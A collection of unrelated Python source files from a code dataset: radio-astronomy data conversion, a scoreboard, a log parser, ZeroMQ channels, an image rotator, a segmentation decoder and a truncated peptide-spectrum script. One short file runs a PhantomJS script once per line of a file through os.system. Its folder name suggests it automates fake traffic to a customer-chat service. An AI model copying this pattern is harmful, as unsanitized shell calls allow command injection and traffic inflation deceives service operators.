np.asarray([bp.aips_bl_ix for bp in bl_products],\n dtype=np.float32)\n\n # Get the AIPS visibility data shape (inaxes)\n # reverse to go from FORTRAN to C ordering\n fits_desc = kat_adapter.fits_descriptor()\n inaxes = tuple(reversed(fits_desc['inaxes'][:fits_desc['naxis']]))\n\n _, nchan, ncorrprods = kat_adapter.shape\n\n out_vis_size = kat_adapter.uv_vis.dtype.itemsize\n out_vis_shape = (time_step, nbl, nchan, nstokes, 3)\n vis_size_estimate = np.product(out_vis_shape, dtype=np.int64)*out_vis_size\n\n EIGHT_GB = 8*1024**3\n\n if vis_size_estimate > EIGHT_GB:\n log.warning(\"Visibility chunk '%s' is greater than '%s'. \"\n \"Check that sufficient memory is available\",\n fmt_bytes(vis_size_estimate), fmt_bytes(EIGHT_GB))\n\n # Get some memory to hold reorganised visibilities\n out_vis = np.empty(out_vis_shape, dtype=kat_adapter.uv_vis.dtype)\n\n def _get_data(time_start, time_end):\n \"\"\"\n Retrieve data for the given time index range.\n\n Parameters\n ----------\n time_start : integer\n Start time index for this scan\n time_end : integer\n Ending time index for this scan\n\n Returns\n -------\n u : np.ndarray\n AIPS baseline U coordinates\n v : np.ndarray\n AIPS baseline V coordinates\n w : np.ndarray\n AIPS baseline W coordinates\n time : np.ndarray\n AIPS timestamp\n baselines : np.ndarray\n AIPS baselines id's\n vis : np.ndarray\n AIPS visibilities\n \"\"\"\n ntime = time_end - time_start\n\n # Retrieve scan data (ntime, nchan, nbl*nstokes)\n # nbl*nstokes is all mixed up at this point\n aips_time = kat_adapter.uv_timestamps[time_start:time_end]\n aips_vis = kat_adapter.uv_vis[time_start:time_end]\n aips_u = kat_adapter.uv_u[time_start:time_end]\n aips_v = kat_adapter.uv_v[time_start:time_end]\n aips_w = kat_adapter.uv_w[time_start:time_end]\n\n # Check dimension shapes\n assert aips_vis.dtype == np.float32\n assert aips_time.dtype == np.float64\n assert aips_u.dtype == np.float64\n assert aips_v.dtype == np.float64\n assert aips_w.dtype == np.float64\n assert (ntime,) == aips_time.shape\n assert (ntime, nchan, ncorrprods, 3) == aips_vis.shape\n assert (ntime, ncorrprods) == aips_u.shape\n assert (ntime, ncorrprods) == aips_v.shape\n assert (ntime, ncorrprods) == aips_w.shape\n\n # Reorganise correlation product dim of aips_vis so that\n # correlations are grouped into nstokes per baseline and\n # baselines are in increasing order.\n aips_vis = _reorganise_product(aips_vis, cp_argsort.reshape(nbl, nstokes), out_vis[:ntime])\n\n # Reshape to include the full AIPS UV inaxes shape,\n # including singleton ra and dec dimensions\n aips_vis.reshape((ntime, nbl,) + inaxes)\n\n # Select UVW coordinate of each baseline\n aips_u = aips_u[:, bl_argsort]\n aips_v = aips_v[:, bl_argsort]\n aips_w = aips_w[:, bl_argsort]\n\n assert aips_u.shape == (ntime, nbl)\n assert aips_v.shape == (ntime, nbl)\n assert aips_w.shape == (ntime, nbl)\n\n # Yield this scan's data\n return (aips_u, aips_v, aips_w,\n aips_time, aips_baselines,\n aips_vis)\n\n # Iterate through scans\n for si, state, target in kat_adapter.scans():\n ntime = kat_adapter.shape[0]\n\n # Create a generator returning data\n # associated with chunks of time data.\n data_gen = (_get_data(ts, min(ts+time_step, ntime)) for ts\n in range(0, ntime, time_step))\n\n # Yield scan variables and the generator\n yield si, state, target, data_gen\n\n\n@numba.jit(nopython=True, parallel=True)\ndef _reorganise_product(vis, cp_argsort, out_vis):\n \"\"\" Reorganise correlation product dim of vis so that\n correlations are grouped as given in cp_argsort.\n\n Parameters\n ----------\n vis : np.ndarray\n Input array of visibilities and weights.\n Shape: (ntime, nchan, nproducts, 3)\n where nproducts is the number of correlation products\n (i.e. nbaselines*nstokes). The last axis holds\n (real_vis, imag_vis, weight).\n cp_argsort : np.ndarray\n 2D array of indices to the 3rd axis of vis that are\n grouped into increasing AIPS baseline order and the\n Stokes order required of AIPS UV.\n Shape: (nbaselines, nstokes)\n out_vis : np.ndarray\n Output array to store reorganised visibilities in\n AIPS UV order.\n Shape: (ntime, nbaselines, nchan, nstokes, 3)\n\n Returns\n -------\n out_vis : np.ndarray\n \"\"\"\n n_time = vis.shape[0]\n n_chan = vis.shape[1]\n n_bl = cp_argsort.shape[0]\n n_stok = cp_argsort.shape[1]\n for tm in range(n_time):\n bstep = 128\n bblocks = (n_bl + bstep - 1) // bstep\n for bblock in numba.prange(bblocks):\n bstart = bblock * bstep\n bstop = min(n_bl, bstart + bstep)\n for prod in range(bstart, bstop):\n in_cp = cp_argsort[prod]\n for stok in range(n_stok):\n in_stok = in_cp[stok]\n for chan in range(n_chan):\n out_vis[tm, prod, chan, stok] = vis[tm, chan, in_stok]\n return out_vis\n","sub_path":"katacomb/katacomb/katdal_adapter.py","file_name":"katdal_adapter.py","file_ext":"py","file_size_in_byte":41345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"249732034","text":"# This script summarizes the scores from the weekly evaluations\n\n# Potential additions:\n# Get weekly totals\n# get totals by forecast type and bonus points\n# Condense the bonus points for each week into one column\n# Calculate ranks and write this out\n\n# %%\nimport pandas as pd\nimport numpy as np\nimport os\n\n# %%\n# User variables\nforecast_num = 2\n\n# %%\n# Setup the scoreboard\nnames = ['name1', 'name2', 'name3']\nnstudent = len(names)\nscoreboard=pd.DataFrame({'total': np.zeros(nstudent)}, index=names)\n\n# %%\n#Read in the weekly forecasts\nforecast_num=2\nfor i in range(1, forecast_num+1):\n print(i)\n # read and add the 1 week forecast\n filename = '1week_forecast' + str(i) + '.csv'\n filepath = os.path.join('..', 'weekly_results', filename)\n if os.path.exists(filepath):\n print(filepath)\n temp = pd.read_csv(filepath, index_col='name')\n label='_F'+str(i)+'W1'\n temp=temp.rename(columns={'points':'points'+label, 'bonus_points': 'bonus'+label})\n scoreboard = pd.merge(left=scoreboard, right=temp[['points'+label, 'bonus'+label]], \n left_index=True, right_index=True)\n \n # read and add the 2 week forecast\n filename = '2week_forecast' + str(i) + '.csv'\n filepath = os.path.join('..', 'weekly_results', filename)\n if os.path.exists(filepath):\n print(filepath)\n temp = pd.read_csv(filepath, index_col='name')\n label='_F'+str(i)+'W2'\n temp=temp.rename(columns={'points':'points'+label, 'bonus_points': 'bonus'+label})\n scoreboard = pd.merge(left=scoreboard, right=temp[['points'+label, 'bonus'+label]], \n left_index=True, right_index=True)\n\n\n# %%\nscoreboard['total']=scoreboard.sum(axis=1)\n# technically this would be a more correct way to do this\n# scoreboard.loc[:, scoreboard.columns != 'total'].sum(axis=1)\n\n# Write out the reults\nfilepath_out = os.path.join('..', 'scoreboard.csv')\nscoreboard.to_csv(filepath_out, index_label='name')\n\n# %%\n","sub_path":"evaluation_scripts/archive/Summarzie_Scores.py","file_name":"Summarzie_Scores.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"304020754","text":"import os\nimport threading\nimport time\nsd=open(\"aa.txt\",\"r\");\nclass mythread(threading.Thread):\n\tdef __init__(self,command):\n\t\tthreading.Thread.__init__(self)\n\t\tself.command=command\n\tdef run(self):\n\t\tkk=os.system(self.command)\nfor line in open(\"aa.txt\",\"r\"):\n\tline=sd.readline()\n\tcommand='phantomjs aa.js %s' %line\n\t# print command\n\tmy_thread=mythread(command)\n\tmy_thread.start()\n\ttime.sleep(10)\n\t","sub_path":"python/刷商务通/bb.py","file_name":"bb.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"256817648","text":"import gzip\nimport json\nimport sys\nimport csv\n\n\n\n# check if file parsed\nif len(sys.argv) == 1:\n\t\tprint(' [*] please specify *.gz file e.g.\\npython app.py test.json.gz')\n\t\tsys.exit(1)\n\n# extract file from zipped format\nwith gzip.open(sys.argv[1], 'r') as in_file:\n\t\ts = in_file.read()\n\n# check if string is json\ntry:\n\t\t\theaders = ['android_sdk_version', 'android_version', 'device_model', 'device_name',\n\t\t\t\t\t\t\t 'device_oem', 'sender_package', 'sender_version_code', 'sender_version_name',\n\t\t\t\t\t\t\t 'cid', 'event', 'priority', 'car.computedDistance', 'car.rpm', 'car.measuredDistance',\n\t\t\t\t\t\t\t 'device.carrierId', 'device.batteryCharge', 'device.networkRoaming', 'car.coolantTemperature',\n\t\t\t\t\t\t\t 'car.vin', 'device.charging', 'device.carrierName', 'device.networkType','obd.vin',\n\t\t\t\t\t\t\t 'gps.longitude','gps.provider','gps.latitude','gps.accuracy','gps.altitude','gps.speed','gps.bearing',\n\t\t\t\t\t\t\t 'car.speed', 'device.locale', 'device.localTimestamp', 'car.measuredFuelLevel','obd.massAirFlow',\n\t\t\t\t\t\t\t 'obd.fuelLevel','obd.moduleVoltage','obd.distanceSinceCCC','obd.load','obd.consumptionRate','obd.ambientAirTemperature',\n\t\t\t\t\t\t\t 'obd.throttlePosition','obd.oilTemp','tripId', 'obd.engineRuntime','car.fuelRate',\n\t\t\t\t\t\t\t 'car.engineRuntime', 'device.androidId', 'timestamp','android_id','device_available_disk_space',\n\t\t\t\t\t\t\t 'device_battery','device_carrier_id','device_carrier_name','device_charging','device_geoip_city','device_geoip_country',\n\t\t\t\t\t\t\t 'device_geoip_subdivision','device_local_ts','device_locale','device_network_roaming','device_network_type'\n\t\t\t\t\t\t\t 'version'\n\t\t\t\t\t\t\t]\n\t\t\tflat_data = []\n\t\t\tfor line in s.decode().split('\\n'):\n\t\t\t\tif line:\n\t\t\t\t\t\tjson_data = json.loads(line)\n\t\t\t\t\t\tfor grp in json_data['groups']:\n\t\t\t\t\t\t\t\tfor dis in grp['distinct']:\n\t\t\t\t\t\t\t\t\t\tdta = grp['common']\n\t\t\t\t\t\t\t\t\t\tdta['version'] = json_data['version']\n\n\t\t\t\t\t\t\t\t\t\t# add tags dict\n\t\t\t\t\t\t\t\t\t\tdistinct_data = dis.pop('tags', None)\n\t\t\t\t\t\t\t\t\t\tnew_dta = dict(dta, **distinct_data)\n\n\t\t\t\t\t\t\t\t\t\t# add distinct dict\n\t\t\t\t\t\t\t\t\t\tnew_dta = dict(new_dta, **dis)\n\t\t\t\t\t\t\t\t\t\tflat_data.append(new_dta)\n\n\t\t# write to csv file\n\t\t\tmyfile = open(sys.argv[1].replace('.gz', '') + '.csv', 'w')\n\t\t\twr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n\t\t\twr.writerow(headers)\n\n\t\t\tfor d in flat_data:\n\t\t\t\t\t\tdata = []\n\t\t\t\t\t\tfor x in headers:\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\tdata.append(d[x])\n\t\t\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\t\t\t\td[x] = 'NULL'\n\t\t\t\t\t\t\t\t\tdata.append(d[x])\n\t\t\t\t\t\twr.writerow(data)\n\n\nexcept json.decoder.JSONDecodeError as j:\n\t\tprint(' [/] file not detected as json, skipping json processing ...')\n\n","sub_path":"LogParser.py","file_name":"LogParser.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"555775501","text":"# 添加日志打印\nimport logging; logging.basicConfig(level=logging.INFO)\n\n\n# 异步IO框架\nimport asyncio\n# 异步HTTP框架\nfrom aiohttp import web\n\n\ndef hello(request):\n\treturn web.Response(body=b'

Hello World

', content_type='text/html')\n\n\n@asyncio.coroutine\ndef init(loop):\n\tapp = web.Application(loop=loop)\n\tapp.router.add_route('Get', '/', hello)\n\tsrv = yield from loop.create_server(app.make_handler(), '127.0.0.1', 9090)\n\tlogging.info(\"server started at http://127.0.0.1:9090\")\n\treturn srv\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(init(loop))\nloop.run_forever()","sub_path":"www/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"585158941","text":"# -*- coding:utf-8 -*-\nimport gevent\n\nfrom corgi import random\nfrom corgi.zeromq import zmq, ctx\n\n\nclass Poller(object):\n def __init__(self, channels):\n self.poller = zmq.Poller()\n self.polled_channels = []\n self.quit_c = Channel()\n self.register(self.quit_c)\n for c in channels:\n self.register(c)\n self.is_active = True\n\n def register(self, channel):\n if channel in self.polled_channels:\n return\n self.polled_channels.append(channel)\n self.poller.register(channel.recv_socket, zmq.POLLIN)\n\n def unregister(self, channel):\n self.poller.unregister(channel.recv_socket)\n self.polled_channels.remove(channel)\n\n def quit(self):\n self.quit_c.send('')\n\n def poll(self, timeout=None):\n assert self.is_active is True\n sockets = dict(self.poller.poll(timeout))\n if not sockets:\n return [(None, None)]\n res = []\n for c in [channel for channel in self.polled_channels if channel.recv_socket in sockets.keys()]:\n if c is self.quit_c:\n self.is_active = False\n continue\n res.append((c, sockets[c.recv_socket]))\n return res\n\n\nclass RecvPoller(Poller):\n def poll(self, timeout=None):\n result = []\n for c, s in super(RecvPoller, self).poll(timeout):\n if c is None:\n return [(None, None, None)]\n msg = c.recv()\n result.append((c, s, msg))\n return result\n\n\nclass Channel(object):\n def __init__(self, addr=None):\n if addr is None:\n addr = '://'.join(['inproc', random.random_uuid()])\n self.addr = addr\n self.send_socket = ctx.socket(zmq.PAIR)\n self.recv_socket = ctx.socket(zmq.PAIR)\n self.send_socket.connect(self.addr)\n self.recv_socket.bind(self.addr)\n\n def send(self, msg):\n self.send_socket.send_string(msg)\n\n # 当没有消息时,recv 会阻塞\n # channel 在 recv 前发送大量的消息,这些消息不会丢失,会在 channel 开始 recv 后一条条被接受\n def recv(self):\n return self.recv_socket.recv_string()\n\n def __eq__(self, other):\n if hasattr(self, 'addr') and hasattr(other, 'addr') and self.addr == other.addr:\n return True\n return False\n\n @property\n def closed(self):\n return self.send_socket.closed or self.recv_socket.closed\n\n def close(self):\n self.send_socket.close()\n self.recv_socket.close()\n\n\nclass Transfer(object):\n def __init__(self):\n self.poller = None\n self.polling = False\n self.quit_c = Channel()\n self.pipelines = []\n\n def add(self, in_c, out_c):\n assert isinstance(in_c, Channel)\n assert isinstance(out_c, Channel)\n self.pipelines.append({'in': in_c,\n 'out': out_c})\n if self.polling:\n self.poller.register(in_c)\n\n def remove(self, in_c, out_c=None):\n assert isinstance(in_c, Channel)\n removed_pipelines = []\n for e in self.pipelines:\n if e['in'] != in_c:\n continue\n if out_c is None or e['out'] == out_c:\n removed_pipelines.append(e)\n for rp in removed_pipelines:\n self.pipelines.remove(rp)\n if in_c not in [e['in'] for e in self.pipelines] and self.polling:\n self.poller.unregister(in_c)\n\n def start(self):\n def _run():\n self.poller = RecvPoller([e['in'] for e in self.pipelines] + [self.quit_c])\n self.polling = True\n while self.polling:\n for c, s, m in self.poller.poll():\n if c is self.quit_c:\n self.polling = False\n self.poller = None\n # self.pipelines.clear()\n break\n for p in self.pipelines:\n if p['in'] == c:\n p['out'].send(m)\n\n gevent.spawn(_run)\n gevent.sleep(0)\n\n","sub_path":"corgi/channel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"452035078","text":"import numpy as np\n\n\ndef rotate_image(img, rot_num=1):\n \"\"\"\n rotates the image counterclockwise for a\n given number of rotations like np.rot90(img)\n\n Parameters\n ----------\n img : numpy.ndarray\n A numpy array representing the image.\n rot_num : int\n An integer determining the number of rotations.\n\n Returns\n -------\n numpy.ndarray\n The rotated image.\n\n Examples\n --------\n >>> from paniz_image import paniz_image\n >>> import numpy as np\n >>> image = np.arange(18).reshape(3,2,3)\n >>> paniz_image.rotate_image(image, 6)\n array([[[15, 16, 17],\n [12, 13, 14]],\n\n [[ 9, 10, 11],\n [ 6, 7, 8]],\n\n [[ 3, 4, 5],\n [ 0, 1, 2]]])\n \"\"\"\n # Handling errors:\n if type(rot_num) != int:\n raise TypeError(\"Number of rotations has to be an integer!\")\n if type(img) != np.ndarray:\n raise TypeError(\"Please pass a numpy array representing an image!\")\n if len(img.shape) not in {2, 3}:\n raise ValueError(\"Your image should have 2 or 3 dimensions!\")\n\n # For a colored image:\n if len(img.shape) == 3:\n if rot_num == 0:\n return img\n else:\n img = np.vstack(\n ([img[:, i, :] for i in range(img.shape[1] - 1, -1, -1)])\n ).reshape(img.shape[1], img.shape[0], img.shape[2])\n return rotate_image(img, rot_num - 1)\n # For a black and white image:\n else:\n if rot_num == 0:\n return img\n else:\n img = np.vstack(\n ([img[:, i] for i in range(img.shape[1] - 1, -1, -1)])\n ).reshape(img.shape[1], img.shape[0])\n return rotate_image(img, rot_num - 1)\n","sub_path":"src/paniz_image/paniz_image.py","file_name":"paniz_image.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"190007133","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..base.model import Model\n\n\nclass Conv3x3GNReLU(nn.Module):\n def __init__(self, in_channels, out_channels, upsample=False):\n\n super().__init__()\n self.upsample = upsample\n self.block = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, (3, 3),\n stride=1, padding=1, bias=False),\n nn.GroupNorm(32, out_channels),\n nn.ReLU(inplace=True),\n )\n\n def forward(self, x):\n x = self.block(x)\n if self.upsample:\n x = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=True)\n return x\n\n\nclass FPNBlockAttG(nn.Module):\n def __init__(self, F_g, F_l, F_int):\n super().__init__()\n self.W_g = nn.Sequential(\n nn.Conv2d(F_g, F_int, kernel_size=1, stride=1, padding=0, bias=True),\n nn.BatchNorm2d(F_int)\n )\n\n self.W_x = nn.Sequential(\n nn.Conv2d(F_l, F_int, kernel_size=1, stride=1, padding=0, bias=True),\n nn.BatchNorm2d(F_int)\n )\n\n self.psi = nn.Sequential(\n nn.Conv2d(F_int, 1, kernel_size=1, stride=1, padding=0, bias=True),\n nn.BatchNorm2d(1),\n nn.Sigmoid()\n )\n\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n x, g = x\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n\n g1 = self.W_g(g)\n x1 = self.W_x(x)\n psi = self.relu(g1 + x1)\n psi = self.psi(psi)\n return x1 * psi + x\n\n\nclass FPNBlock(nn.Module):\n def __init__(self, pyramid_channels, skip_channels):\n super().__init__()\n self.skip_conv = nn.Conv2d(skip_channels, pyramid_channels, kernel_size=1)\n\n def forward(self, x):\n x, skip = x\n\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n skip = self.skip_conv(skip)\n\n x = x + skip\n return x\n\n\nclass SegmentationBlock(nn.Module):\n def __init__(self, in_channels, out_channels, n_upsamples=0):\n super().__init__()\n\n blocks = [\n Conv3x3GNReLU(in_channels, out_channels, upsample=bool(n_upsamples))\n ]\n\n if n_upsamples > 1:\n for _ in range(1, n_upsamples):\n blocks.append(Conv3x3GNReLU(out_channels, out_channels, upsample=True))\n\n self.block = nn.Sequential(*blocks)\n\n def forward(self, x):\n return self.block(x)\n\n\nclass SupervisionBlock(nn.Module):\n def __init__(self, in_channels, out_channels, final_channels):\n super().__init__()\n\n blocks = [Conv3x3GNReLU(in_channels, out_channels, upsample=True),\n nn.Conv2d(out_channels, final_channels, kernel_size=1, padding=0)]\n self.block = nn.Sequential(*blocks)\n\n def forward(self, x):\n return self.block(x)\n\n\nclass FPNDecoder(Model):\n\n def __init__(\n self,\n encoder_channels,\n pyramid_channels=256,\n segmentation_channels=128,\n final_upsampling=4,\n final_channels=1,\n hypercolumn=False,\n supervision=False,\n attentionGate=False,\n dropout=0.2,\n ):\n super().__init__()\n self.final_upsampling = final_upsampling\n self.hypercolumn = hypercolumn\n self.supervision = supervision\n\n if attentionGate:\n print(\"Use attention\")\n self.conv1 = nn.Conv2d(encoder_channels[0], pyramid_channels, kernel_size=(1, 1))\n self.p4 = FPNBlockAttG(encoder_channels[1], pyramid_channels, pyramid_channels)\n self.p3 = FPNBlockAttG(encoder_channels[2], pyramid_channels, pyramid_channels)\n self.p2 = FPNBlockAttG(encoder_channels[3], pyramid_channels, pyramid_channels)\n\n else:\n self.conv1 = nn.Conv2d(encoder_channels[0], pyramid_channels, kernel_size=(1, 1))\n self.p4 = FPNBlock(pyramid_channels, encoder_channels[1])\n self.p3 = FPNBlock(pyramid_channels, encoder_channels[2])\n self.p2 = FPNBlock(pyramid_channels, encoder_channels[3])\n\n self.s5 = SegmentationBlock(pyramid_channels, segmentation_channels, n_upsamples=3)\n self.s4 = SegmentationBlock(pyramid_channels, segmentation_channels, n_upsamples=2)\n self.s3 = SegmentationBlock(pyramid_channels, segmentation_channels, n_upsamples=1)\n self.s2 = SegmentationBlock(pyramid_channels, segmentation_channels, n_upsamples=0)\n\n self.dropout = nn.Dropout2d(p=dropout, inplace=True)\n last_conv_channels = segmentation_channels*4 if self.hypercolumn else segmentation_channels\n self.final_conv = nn.Conv2d(last_conv_channels, final_channels, kernel_size=1, padding=0)\n\n self.initialize()\n\n def forward(self, x):\n c5, c4, c3, c2, _ = x\n\n p5 = self.conv1(c5)\n p4 = self.p4([p5, c4])\n p3 = self.p3([p4, c3])\n p2 = self.p2([p3, c2])\n\n s5 = self.s5(p5)\n s4 = self.s4(p4)\n s3 = self.s3(p3)\n s2 = self.s2(p2)\n\n if self.hypercolumn:\n x = torch.cat([s5, s4, s3, s2], dim=1)\n else:\n x = s5 + s4 + s3 + s2\n\n x = self.dropout(x)\n x = self.final_conv(x)\n\n if self.final_upsampling is not None and self.final_upsampling > 1:\n x = F.interpolate(x, scale_factor=self.final_upsampling, mode='bilinear', align_corners=True)\n\n return x\n","sub_path":"src/models/segmentation_models_pytorch_danil/fpn/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":5443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"536340402","text":"try:\r\n\timport pygraphviz as pgv\r\nexcept:\r\n\tpass\r\nfrom collections import defaultdict\r\nfrom copy import deepcopy\r\n\r\nclass OneSquare(object):\r\n\t\"\"\"One square with four nodes of peptide and two pairs of same amino acid\r\n\t\tA -a-> aA\r\n\t\t: :\r\n\t\tb b\r\n\t\t: :\r\n\t\tAb -a-> aAb\"\"\"\r\n\tdef __init__(self, pairs):\r\n\t\tsuper(OneSquare, self).__init__()\r\n\t\tself.n0 = pairs[0]\r\n\t\tself.a1 = pairs[1]\r\n\t\tself.a2 = pairs[2]\r\n\t\tself.n1 = pairs[3]\r\n\t\tself.n2 = pairs[4]\r\n\t\tself.n3 = pairs[5]\r\n\t\tself.right = []\r\n\t\tself.left = []\r\n\t\tself.up = []\r\n\t\tself.down = []\t\r\n\t\tself.diag = []\r\n\r\n\tdef detail(self, PRINT = True, COMPACT = False):\r\n\t\tif COMPACT:\r\n\t\t\tstring = '%s, %s\\n%s, %s\\n%s, %s' % (self.n0, self.n1, self.n2, self.n3, self.a1, self.a2)\r\n\t\telse:\r\n\t\t\tstring = '%s\\t-%s->\\t%s\\n | \\t\\t\\t |\\n %s \\t\\t\\t %s\\n | \\t\\t\\t |\\n%s\\t-%s->\\t%s' %\\\r\n\t\t\t\t(self.n0, self.a1, self.n1, self.a2, self.a2, self.n2, self.a1, self.n3)\r\n\t\tif PRINT:\r\n\t\t\tprint(string + '\\n')\r\n\t\treturn string\r\n\r\n\tdef trans(self):\r\n\t\tpairs = [self.n0, self.a2, self.a1, self.n2, self.n1, self.n3]\r\n\t\treturn OneSquare(pairs)\r\n\r\ndef Function0(err = 0.3, tablefull = False):\r\n\te_spec = list(map(lambda x: eval(x), '371.5 375.4 390.4 392.2 409.0 420.2 427.2 443.3 446.4 461.3 471.4 477.4 491.3 505.3 506.4 519.2 536.1 546.5 553.3 562.3 588.2 600.3 616.2 617.4 618.3 633.4 634.4 636.2 651.5 652.4 702.5 703.4 712.5 718.3 721.0 730.3 749.4 762.6 763.4 764.4 779.6 780.4 781.4 782.4 797.3 862.4 876.4 877.4 878.6 879.4 893.4 894.4 895.4 896.5 927.4 944.4 975.5 976.5 977.4 979.4 1005.5 1007.5 1022.5 1023.7 1024.5 1039.5 1040.3 1042.5 1043.4 1057.5 1119.6 1120.6 1137.6 1138.6 1139.5 1156.5 1157.6 1168.6 1171.6 1185.4 1220.6 1222.5 1223.6 1239.6 1240.6 1250.5 1256.5 1266.5 1267.5 1268.6'.split(' ')))\r\n\tif tablefull == True:\r\n\t\tmasstable = [57, 71, 87, 97, 99, 101, 103, 113, 114, 115, 128, 129, 131, 132, 137, 147, 156, 163, 186]\r\n\telse:\r\n\t\tmasstable = [99, 128, 113, 147, 97, 186, 114, 163]\r\n\tlenth = len(e_spec)\r\n\taanum = len(masstable)\r\n\tfw = open('ProteinNode.txt', 'w')\r\n\tfor idx1 in range(lenth):\r\n\t\ttarget = e_spec[idx1]\r\n\t\tcnt = 0\r\n\t\tfor i in range(aanum):\r\n\t\t\ttarget2 = target + masstable[i]\r\n\t\t\tfor idx2 in range(idx1 + 1, lenth):\r\n\t\t\t\tspecnum = e_spec[idx2]\r\n\t\t\t\tif target2 > specnum - err and target2 < specnum + err:\r\n\t\t\t\t\tfw.write('%.1f\\t%d\\t%.1f\\n' % (target, masstable[i], specnum))\r\n\t\t\t\t\tcnt += 1\r\n\tfw.close()\r\n\tprint(\"\\n\\n\\n\\nProteinNode.txt has been changed, with %.1f err and %s table.\" % \\\r\n\t\t(err, 'FULL' if tablefull == True else 'PARTIAL'))\r\n\tprint('You can set err using the first parameter,')\r\n\tprint('and choose full table (True) or partial table (False) using the second parameter.\\n\\n\\n')\r\n\r\ndef Function1():\r\n\tnodesset = set()\r\n\tnodes = defaultdict(list)\r\n\tf = open('ProteinNode.txt')\r\n\tfor l in f:\r\n\t\tl = l.rstrip().split('\\t')\r\n\t\tnodes[l[0]].append(l[-1])\r\n\t\tnodesset.add(l[0])\r\n\t\tnodesset.add(l[-1])\r\n\tf.close()\r\n\ttry:\r\n\t\tg = pgv.AGraph()\r\n\t\tfor key in nodesset:\r\n\t\t\tg.add_node(key)\r\n\t\tfor key in nodes:\r\n\t\t\tfor value in nodes[key]:\r\n\t\t\t\tg.add_edge(key, value)\r\n\t\tg.layout()\r\n\t\tg.draw('NodesTree.png')\r\n\texcept:\r\n\t\tprint('\\n\\n\\n\\n\\nPlease run in Linux-Bioinformatics\\n\\n\\n\\n\\n')\r\n\r\ndef Function2(WRITE = True):\r\n\tnodes = defaultdict(dict)\r\n\tf = open('ProteinNode.txt')\r\n\tfor l in f:\r\n\t\tl = l.rstrip().split('\\t')\r\n\t\tnodes[l[0]][l[1]] = l[-1]\r\n\tstorelist = []\r\n\texist = set()\r\n\tnodes = dict(nodes)\r\n\tfor pep in nodes:\r\n\t\tfor key1 in nodes[pep]:\r\n\t\t\tpep1 = nodes[pep][key1]\r\n\t\t\tif pep1 not in nodes:\r\n\t\t\t\tcontinue\r\n\t\t\tfor key2 in nodes[pep1]:\r\n\t\t\t\tif key2 == key1:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tpep3 = nodes[pep1][key2]\r\n\t\t\t\tif key2 not in nodes[pep]:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tpep2 = nodes[pep][key2]\r\n\t\t\t\tif pep2 not in nodes:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif key1 not in nodes[pep2]:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tpep4 = nodes[pep2][key1]\r\n\t\t\t\tif pep3 == pep4:\r\n\t\t\t\t\tls = [pep, key1, key2, pep1, pep2, pep3]\r\n\t\t\t\t\tstring = ','.join(sorted(ls))\r\n\t\t\t\t\tif string not in exist:\r\n\t\t\t\t\t\texist.add(string)\r\n\t\t\t\t\t\tstorelist.append(ls)\r\n\tif WRITE:\r\n\t\tfw = open('ProteinNode2.txt', 'w')\r\n\t\tfor x in storelist:\r\n\t\t\tfw.write(','.join(x) + '\\n')\r\n\t\tfw.close()\r\n\treturn storelist\r\n\r\ndef Function3():\r\n\tstorelist = Function2(False)\r\n\tsetnet = set()\r\n\tnets = []\r\n\tfor peps1 in storelist:\r\n\t\tfor peps2 in storelist:\r\n\t\t\tif peps1[0] == peps2[0]:\r\n\t\t\t\tcontinue\r\n\t\t\tif peps1[3] in peps2 and peps1[4] not in peps2:\r\n\t\t\t\tsamenode = peps1[3]\r\n\t\t\telif peps1[3] not in peps2 and peps1[4] in peps2:\r\n\t\t\t\tsamenode = peps1[4]\r\n\t\t\telse:\r\n\t\t\t\tcontinue\r\n\t\t\tfor peps in storelist:\r\n\t\t\t\tif peps[0] != samenode:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif (peps[3] == peps1[-1] and peps[4] == peps2[-1]) or \\\r\n\t\t\t\t\t(peps[4] == peps1[-1] and peps[3] == peps2[-1]):\r\n\t\t\t\t\tls = [peps1[0], peps2[0], peps1[3], peps1[4], peps2[3], peps2[4], samenode, peps1[-1], peps2[-1], peps[-1]]\r\n\t\t\t\t\tif tuple(sorted(ls)) not in setnet:\r\n\t\t\t\t\t\tsetnet.add(tuple(sorted(ls)))\r\n\t\t\t\t\t\tnets.append(ls)\r\n\tfor net in sorted(nets):\r\n\t\tpart = net[2:6]\r\n\t\tfor i in range(len(part)):\r\n\t\t\tif i in (0, 1) and part[i] != net[6]:\r\n\t\t\t\tnode1 = part[i]\r\n\t\t\telif i in (2, 3) and part[i] != net[6]:\r\n\t\t\t\tnode2 = part[i]\r\n\t\tprint(' %s--%s' % (net[0], node1))\r\n\t\tprint(' | |')\r\n\t\tprint('%s--%s--%s' % (net[1], net[6], net[7]))\r\n\t\tprint(' | | 